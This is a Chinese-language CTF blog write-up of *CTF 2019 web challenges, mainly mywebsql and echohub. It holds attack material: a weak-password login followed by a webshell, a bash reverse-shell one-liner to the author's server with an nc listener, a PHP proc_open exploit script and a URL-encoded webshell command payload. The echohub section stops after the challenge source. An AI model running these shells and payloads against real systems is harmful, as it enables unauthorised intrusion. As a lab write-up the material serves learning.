Damn1t
for you I bleed myself dry
FRIENDS
baidu

startctf2019

2019-04-30 ctf

starctf2019

mywebsql

admin admin弱口令登入,网上搜索,关于mywebsql的cve,找到了一个rce,按照他的步骤,生成一个shell,蚁剑连接,将同名目录下的readflag下载下来,实在没啥思路,之后参考了师傅的blog

运行readflag文件:/readflag,会出现:

Solve the easy challenge first
(((((886366)-(-362092))+(188748))-(-638404))-(-286590))
input your answer: calculate error!

然后闪退
/backups目录下新建一个sh文件(本目录下权限最大),内容如下:

1
bash -i >& /dev/tcp/Your IP/8888 0>&1

在自己的vps上监听:

1
nc -lvvp 8888

成功反弹shell

ida查看readflag文件,注意到ualarm函数,有如下描述:

Description
The ualarm() function causes the signal SIGALRM to be sent to the invoking process after (not less than) usecs microseconds. The delay may be lengthened slightly by any system activity or by the time spent processing the call or by the granularity of system timers.

Unless caught or ignored, the SIGALRM signal will terminate the process.

If the interval argument is nonzero, further SIGALRM signals will be sent every interval microseconds after the first.

注意这句话:
Unless caught or ignored, the SIGALRM signal will terminate the process.
所以我们试图去捕获sigalrm
找到一个参考:https://www.cnblogs.com/maxgongzuo/p/6372898.html
利用:trap '' 14

最后:

Solve the easy challenge first
(((((-95329)-(-655048))+(-432249))+(476302))-(-374607))
input your answer: 978379
ok! here is your flag!!
*ctf{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}

方法2:参考writeup
新建一个exp.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
$descriptorspec = array(
   0 => array("pipe", "r"),  // 标准输入,子进程从此管道中读取数据
   1 => array("pipe", "w"),  // 标准输出,子进程向此管道中写入数据
   2 => array("file", "/tmp/error-output.txt", "a") // 标准错误,写入到一个文件
);
$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('/readflag', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    // $pipes 现在看起来是这样的:
    // 0 => 可以向子进程标准输入写入的句柄
    // 1 => 可以从子进程标准输出读取的句柄
    // 错误输出将被追加到文件 /tmp/error-output.txt
    //fwrite($pipes[0], '');
    //fclose($pipes[0]);
        $output1 = fread($pipes[1],1024);
        var_dump($output);
        $output2 = fread($pipes[1],1024);
        var_dump($output);
        $output3 = fread($pipes[1],1024);
        var_dump($output);
    
    $calc = trim($output2);
    $an = eval("return $calc;");
    var_dump($an);
    fwrite($pipes[0], (string)$an."\n");
    $output = stream_get_contents($pipes[1]);
    var_dump($output);
    // 切记:在调用 proc_close 之前关闭所有的管道以避免死锁。
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

执行可得:

PHP Notice: Undefined variable: output in /var/www/html/backups/exp.php on line 18
NULL
PHP Notice: Undefined variable: output in /var/www/html/backups/exp.php on line 20
NULL
PHP Notice: Undefined variable: output in /var/www/html/backups/exp.php on line 22
NULL
int(-1669937)
string(63) “ok! here is your flag!!
*ctf{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}

command returned 0

方法3(同二有些类似):

1
http://targeturl/backups/123456.php?cmd=$d=array(0=%3Earray(%22pipe%22,%22r%22),1=%3Earray(%22pipe%22,%22w%22));$fp=proc_open(%22../../../../readflag%22,$d,$pipes);$a=fgets($pipes[1]);$x=fgets($pipes[1]);$ret=eval(%22return%20$x;%22);echo%20$ret.%22%3CBR%3E%22;$emm=fwrite($pipes[0],strval($ret));echo%20$emm.%22%3CBR%3E%22;fclose($pipes[0]);$c=fgets($pipes[1]);$e=fgets($pipes[1]);echo%20$c.%20$e.%22%3CBR%3E%22;fclose($pipes[1]);proc_close($fp);

proc_open函数

she

一个游戏,下载rpg maker xp
新建项目,然后将she下面的文件复制到项目中,然后再打开项目,就可以进行编辑

echohub

查看源码,注意到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

<!--/?source=1-->
<pre>
 .----------------.  .----------------.  .----------------.  .----------------.  .----------------.  .----------------.  .----------------.  
| .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. | 
| |  _________   | || |     ______   | || |  ____  ____  | || |     ____     | || |  ____  ____  | || | _____  _____ | || |   ______     | | 
| | |_   ___  |  | || |   .' ___  |  | || | |_   ||   _| | || |   .'    `.   | || | |_   ||   _| | || ||_   _||_   _|| || |  |_   _ \    | | 
| |   | |_  \_|  | || |  / .'   \_|  | || |   | |__| |   | || |  /  .--.  \  | || |   | |__| |   | || |  | |    | |  | || |    | |_) |   | | 
| |   |  _|  _   | || |  | |         | || |   |  __  |   | || |  | |    | |  | || |   |  __  |   | || |  | '    ' |  | || |    |  __'.   | | 
| |  _| |___/ |  | || |  \ `.___.'\  | || |  _| |  | |_  | || |  \  `--'  /  | || |  _| |  | |_  | || |   \ `--' /   | || |   _| |__) |  | | 
| | |_________|  | || |   `._____.'  | || | |____||____| | || |   `.____.'   | || | |____||____| | || |    `.__.'    | || |  |_______/   | | 
| |              | || |              | || |              | || |              | || |              | || |              | || |              | | 
| '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' | 
 '----------------'  '----------------'  '----------------'  '----------------'  '----------------'  '----------------'  '----------------'  
 
 Welcome to random stack ! Try to execute `/readflag` :P
 
 </pre>

 <form action="/" method="post">root > <input name="data" placeholder="input some data"></form>O0OO0stack

于是得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?php
$banner = <<<EOF
<!--/?source=1-->
<pre>
 .----------------.  .----------------.  .----------------.  .----------------.  .----------------.  .----------------.  .----------------.  
| .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. | 
| |  _________   | || |     ______   | || |  ____  ____  | || |     ____     | || |  ____  ____  | || | _____  _____ | || |   ______     | | 
| | |_   ___  |  | || |   .' ___  |  | || | |_   ||   _| | || |   .'    `.   | || | |_   ||   _| | || ||_   _||_   _|| || |  |_   _ \    | | 
| |   | |_  \_|  | || |  / .'   \_|  | || |   | |__| |   | || |  /  .--.  \  | || |   | |__| |   | || |  | |    | |  | || |    | |_) |   | | 
| |   |  _|  _   | || |  | |         | || |   |  __  |   | || |  | |    | |  | || |   |  __  |   | || |  | '    ' |  | || |    |  __'.   | | 
| |  _| |___/ |  | || |  \ `.___.'\  | || |  _| |  | |_  | || |  \  `--'  /  | || |  _| |  | |_  | || |   \ `--' /   | || |   _| |__) |  | | 
| | |_________|  | || |   `._____.'  | || | |____||____| | || |   `.____.'   | || | |____||____| | || |    `.__.'    | || |  |_______/   | | 
| |              | || |              | || |              | || |              | || |              | || |              | || |              | | 
| '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' | 
 '----------------'  '----------------'  '----------------'  '----------------'  '----------------'  '----------------'  '----------------'  
 
 Welcome to random stack ! Try to execute `/readflag` :P
 
 </pre>

 <form action="/" method="post">root > <input name="data" placeholder="input some data"></form>
EOF;
echo $banner;
if(isset($_GET['source'])){
    $file = fopen("index.php","r");
    $contents = fread($file,filesize("index.php"));
    echo "---------------sourcecode---------------";
    echo base64_encode($contents);
    echo "----------------------------------------";
    fclose($file);
    //Dockerfile here
    echo "RlJPTSB1YnVudHU6MTguMDQKClJVTiBzZWQgLWkgInMvaHR0cDpcL1wvYXJjaGl2ZS51YnVudHUuY29tL2h0dHA6XC9cL21pcnJvcnMudXN0Yy5lZHUuY24vZyIgL2V0Yy9hcHQvc291cmNlcy5saXN0ClJVTiBhcHQtZ2V0IHVwZGF0ZQpSVU4gYXB0LWdldCAteSBpbnN0YWxsIHNvZnR3YXJlLXByb3BlcnRpZXMtY29tbW9uClJVTiBhZGQtYXB0LXJlcG9zaXRvcnkgLXkgcHBhOm9uZHJlai9waHAKUlVOIGFwdC1nZXQgdXBkYXRlClJVTiBhcHQtZ2V0IC15IHVwZ3JhZGUKUlVOIGFwdC1nZXQgLXkgaW5zdGFsbCB0emRhdGEKUlVOIGFwdC1nZXQgLXkgaW5zdGFsbCB2aW0KUlVOIGFwdC1nZXQgLXkgaW5zdGFsbCBhcGFjaGUyClJVTiBhcHQtY2FjaGUgc2VhcmNoICJwaHAiIHwgZ3JlcCAicGhwNy4zInwgYXdrICd7cHJpbnQgJDF9J3wgeGFyZ3MgYXB0LWdldCAteSBpbnN0YWxsClJVTiBzZXJ2aWNlIC0tc3RhdHVzLWFsbCB8IGF3ayAne3ByaW50ICQ0fSd8IHhhcmdzIC1pIHNlcnZpY2Uge30gc3RvcAoKUlVOIHJtIC92YXIvd3d3L2h0bWwvaW5kZXguaHRtbApDT1BZIHJhbmRvbXN0YWNrLnBocCAvdmFyL3d3dy9odG1sL2luZGV4LnBocApDT1BZIHNhbmRib3gucGhwIC92YXIvd3d3L2h0bWwvc2FuZGJveC5waHAKUlVOIGNobW9kIDc1NSAtUiAvdmFyL3d3dy9odG1sLwpDT1BZIGZsYWcgL2ZsYWcKQ09QWSByZWFkZmxhZyAvcmVhZGZsYWcKUlVOIGNobW9kIDU1NSAvcmVhZGZsYWcKUlVOIGNobW9kIHUrcyAvcmVhZGZsYWcKUlVOIGNobW9kIDUwMCAvZmxhZwpDT1BZIC4vcnVuLnNoIC9ydW4uc2gKQ09QWSAuL3BocC5pbmkgL2V0Yy9waHAvNy4zL2FwYWNoZTIvcGhwLmluaQpSVU4gY2htb2QgNzAwIC9ydW4uc2gKCkNNRCBbIi9ydW4uc2giXQ=="; 
    highlight_file(__FILE__);

}
$disable_functions = ini_get("disable_functions");
$loadext = get_loaded_extensions();
foreach ($loadext as $ext) {
    if(in_array($ext,array("Core","date","libxml","pcre","zlib","filter","hash","sqlite3","zip"))) continue;
    else {
        if(count(get_extension_funcs($ext)?get_extension_funcs($ext):array()) >= 1)
            $dfunc = join(',',get_extension_funcs($ext));
        else
            continue;
        $disable_functions = $disable_functions.$dfunc.",";

    }
}
$func = get_defined_functions()["internal"];
foreach ($func as $f){
    if(stripos($f,"file") !== false || stripos($f,"open") !== false || stripos($f,"read") !== false || stripos($f,"write") !== false){
        $disable_functions = $disable_functions.$f.",";
    }
}

ini_set("disable_functions", $disable_functions);
ini_set("open_basedir","/var/www/html/:/tmp/".md5($_SERVER['REMOTE_ADDR'])."/");

Author: damn1t

Link: http://microvorld.com/2019/04/30/CTF/starctf2019/

Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stating additionally.

< PreviousPost
leopold 靶机渗透NextPost >
python常见问题
CATALOG
  1. 1. starctf2019
    1. 1.1. mywebsql
    2. 1.2. she
    3. 1.3. echohub